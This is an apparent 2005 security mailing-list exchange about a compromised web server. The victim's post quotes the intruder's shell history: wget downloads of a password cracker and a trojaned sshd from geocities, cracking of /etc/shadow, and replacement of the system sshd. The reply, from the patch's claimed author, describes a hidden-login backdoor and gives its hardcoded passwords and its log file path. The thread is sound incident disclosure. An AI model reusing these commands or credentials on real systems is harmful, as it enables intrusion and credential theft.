Re: SSH compiled with backdoor

["VeNoMouS" <venom () gen-x co nz>]

Hi Steve, i actually wrote that patch back in like shit 2001 or something it 
logs all ssh connection logins in plain to a txt file, it also puts a 
backdoor passwd into the ssh and wont show up in wtmp, making the user (what 
ever he logs in as ) invisible, so say u login with the username root and 
your use the global hidden passwd it will allow him on as root.

looking at the code he users the following passwds for this global passwd.
"toji" and "fv11r01rc3@l"

the file that logs all the logins with time stamps and src ips is "dev/saux"


Hope this helps you , if you require any further information email me back, 
been a few years since I even looked at this code.

---------- Forwarded message ----------
From: steve () example org <steve () example org>
Date: 27 Aug 2005 13:02:08 -0000
Subject: SSH compiled with backdoor
To: incidents () securityfocus com


Hi!

One of my web servers was hacked on July 17, 2005.  bash_history showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root
seemed well protected.  From looking in all the bash_history, it
appears the hacker came in from the website account, and did an su
from there.

I found this about a month later when I logged into the box, did an
ls, only to be met by a seg fault.  A ps x showed mech.tgz trying to
be downloaded, and a bunch of other CRON processes running.  The auth
log didn't show other logins, though, so the ssh installed must have
logging turned off for the backdoor they installed.

I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files
on my system).

Last showed:
reboot   system boot  2.4.18-bf2.4     Sun Jul 17 18:15         (37+11:47)
website  pts/0        193.231.77.74    Sun Jul 17 17:42 - down   (00:27)
website  pts/1        193.231.77.74    Sun Jul 17 17:05 - 17:26  (00:20)
website  pts/0        211.43.207.169   Sun Jul 17 16:26 - 17:41  (01:14)

whois says:
inetnum:      193.231.77.0 - 193.231.77.255
netname:      DATANET-RO
descr:        Starnets - Datanet
country:      RO
address:      DATA NET
address:      Str. Ioan N. Roman Nr. 13
address:      Constanta, cod 900199, ROMANIA

Best Regards,

Steve